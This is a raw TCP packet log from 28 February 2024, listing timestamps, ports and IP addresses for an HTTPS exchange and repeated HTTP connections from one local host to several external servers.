Feb 28, 2024 15:43:36.626713991 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.626904964 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.626975060 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.627194881 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.630129099 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.630335093 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.631866932 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.632039070 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.632110119 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.632309914 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.635258913 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.635458946 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.635513067 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.635700941 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.638643980 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.638813972 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.638889074 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.639086962 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.642061949 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.642306089 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.642375946 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.642638922 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.645246983 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.645450115 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.645508051 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.645747900 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.648658037 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.648848057 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.648906946 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.649190903 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.651745081 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.651973009 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.652028084 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.652292013 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.654983044 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.655145884 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.655200958 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.655420065 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.658190012 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.658397913 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.658467054 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.658751011 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.661288977 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.661519051 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.661582947 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.661845922 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.664422989 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.664747953 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.664808989 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.665019989 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.667735100 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.667910099 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.667988062 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.668191910 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.670717955 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.670921087 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.672225952 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.672422886 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.672493935 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.672693014 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.675056934 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.675225019 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.675287008 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.675512075 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.677894115 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.678055048 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.678117990 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.678329945 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.680969000 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.681214094 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.681283951 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.681515932 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.683717966 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.683959007 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.684012890 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.684231997 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.686788082 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.686983109 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.687037945 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.687299967 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.689558029 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.689740896 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.689800024 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.690006018 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.692483902 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.692652941 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.692718983 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.692925930 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.695317984 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.695538998 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.695593119 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.695833921 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.698249102 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.698479891 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.698556900 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.698795080 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.701077938 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.701255083 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.701309919 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.701554060 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.703623056 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.703921080 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.703975916 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.704242945 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.706159115 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.706392050 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.707436085 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.707626104 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.707684994 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.707983017 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.710004091 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.710264921 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.710319042 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.710527897 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.712412119 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.712690115 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.712744951 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.713036060 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.714865923 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.715040922 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.715114117 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.715322971 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.717180967 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.717498064 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.717551947 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.717849016 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.719542980 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.719799042 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.719854116 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.720065117 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.721786976 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.722150087 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.722212076 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.722481966 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.724109888 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.724325895 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.724384069 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.724615097 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.726243019 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.726404905 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.726464033 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.726696014 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.728501081 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.728689909 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.728761911 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.729074955 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.730747938 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.730914116 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.730993032 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.731195927 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.732791901 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.733007908 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.733069897 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.733354092 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.734925032 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.735213041 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.735266924 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.735551119 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.737013102 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.737190008 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.737250090 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.737447023 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.738995075 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.739279985 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.740154982 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.740371943 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.740426064 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.740598917 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.742192984 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.742423058 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.742494106 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.742702007 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.744216919 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.744395971 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.744477034 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.744600058 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.744645119 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.744786978 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.744856119 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.744918108 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.744961977 CET	443	50225	142.250.188.225	192.168.11.20
Feb 28, 2024 15:43:36.744982004 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:43:36.745208979 CET	50225	443	192.168.11.20	142.250.188.225
Feb 28, 2024 15:44:16.643739939 CET	50226	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:16.962294102 CET	80	50226	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:17.466521978 CET	50226	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:17.780771971 CET	80	50226	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:18.294661045 CET	50226	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:18.620805025 CET	80	50226	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:19.122540951 CET	50226	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:19.446702003 CET	80	50226	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:19.950314999 CET	50226	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:20.275968075 CET	80	50226	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:23.271517992 CET	50227	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:23.596625090 CET	80	50227	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:24.105721951 CET	50227	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:24.430663109 CET	80	50227	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:24.933722973 CET	50227	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:25.258625984 CET	80	50227	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:25.761699915 CET	50227	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:26.086745024 CET	80	50227	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:26.589493036 CET	50227	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:44:26.914454937 CET	80	50227	156.232.32.175	192.168.11.20
Feb 28, 2024 15:44:29.283971071 CET	50228	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:44:30.291934013 CET	50228	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:44:32.307178974 CET	50228	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:44:36.321897030 CET	50228	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:44:44.335676908 CET	50228	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:44:51.339807034 CET	50229	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:44:52.349608898 CET	50229	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:44:54.364734888 CET	50229	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:44:58.379566908 CET	50229	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:44:58.543437958 CET	50230	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:44:58.699871063 CET	80	50230	172.67.130.3	192.168.11.20
Feb 28, 2024 15:44:58.700119972 CET	50230	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:44:58.700957060 CET	50230	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:44:58.857461929 CET	80	50230	172.67.130.3	192.168.11.20
Feb 28, 2024 15:44:58.870976925 CET	80	50230	172.67.130.3	192.168.11.20
Feb 28, 2024 15:44:58.871246099 CET	80	50230	172.67.130.3	192.168.11.20
Feb 28, 2024 15:44:58.871447086 CET	50230	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:44:58.871536016 CET	50230	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:44:59.028076887 CET	80	50230	172.67.130.3	192.168.11.20
Feb 28, 2024 15:45:06.393361092 CET	50229	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:45:09.158071995 CET	50231	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:09.326824903 CET	80	50231	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:09.327181101 CET	50231	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:09.327282906 CET	50231	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:09.495884895 CET	80	50231	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:09.495965004 CET	80	50231	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:09.496526003 CET	80	50231	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:09.496675968 CET	50231	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:10.830012083 CET	50231	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:11.845796108 CET	50232	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:12.014453888 CET	80	50232	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:12.014688015 CET	50232	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:12.014873981 CET	50232	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:12.183176994 CET	80	50232	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:12.183314085 CET	80	50232	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:12.183758974 CET	80	50232	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:12.183957100 CET	50232	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:12.408404112 CET	50233	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:45:13.423135996 CET	50233	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:45:13.516922951 CET	50232	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.532629967 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.700917959 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:14.701096058 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.702466011 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.702545881 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.871213913 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:14.871340036 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:14.871521950 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.871617079 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.871695042 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:14.871697903 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.871893883 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:14.872184992 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:14.872379065 CET	50234	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:15.040477991 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.040906906 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.041475058 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.041542053 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.041583061 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.041944981 CET	80	50234	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:15.438306093 CET	50233	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:45:17.219515085 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.388325930 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.388673067 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.388811111 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.557076931 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.557359934 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.557383060 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.557424068 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.557704926 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:17.557779074 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.557842016 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.557992935 CET	50235	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:45:17.726449966 CET	80	50235	82.180.172.14	192.168.11.20
Feb 28, 2024 15:45:19.453027010 CET	50233	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:45:22.863416910 CET	50236	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:23.096441984 CET	80	50236	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:23.096724987 CET	50236	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:23.096946955 CET	50236	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:23.330658913 CET	80	50236	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:23.424931049 CET	80	50236	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:23.425004959 CET	80	50236	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:23.425256014 CET	50236	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:24.608263016 CET	50236	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:25.623975992 CET	50237	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:25.857633114 CET	80	50237	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:25.857902050 CET	50237	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:25.858242989 CET	50237	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:26.088350058 CET	80	50237	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:27.221620083 CET	80	50237	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:27.221698999 CET	80	50237	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:27.221911907 CET	50237	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:27.373382092 CET	50237	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:27.466948032 CET	50233	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:45:28.388992071 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.634100914 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.634375095 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.635708094 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.635801077 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.888140917 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888220072 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888262033 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888307095 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888395071 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888465881 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888516903 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.888631105 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.888631105 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.888705969 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.888778925 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.888863087 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:28.889051914 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:28.889218092 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.129960060 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130037069 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130079031 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130116940 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130162001 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130206108 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130244970 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.130392075 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.130537033 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.130707026 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.364890099 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.365209103 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.366648912 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.367018938 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.367172003 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.606492996 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.606760025 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.650857925 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.651070118 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:29.842449903 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:29.886567116 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:30.138289928 CET	50238	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:30.401325941 CET	80	50238	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:30.401617050 CET	50238	80	192.168.11.20	198.54.117.242
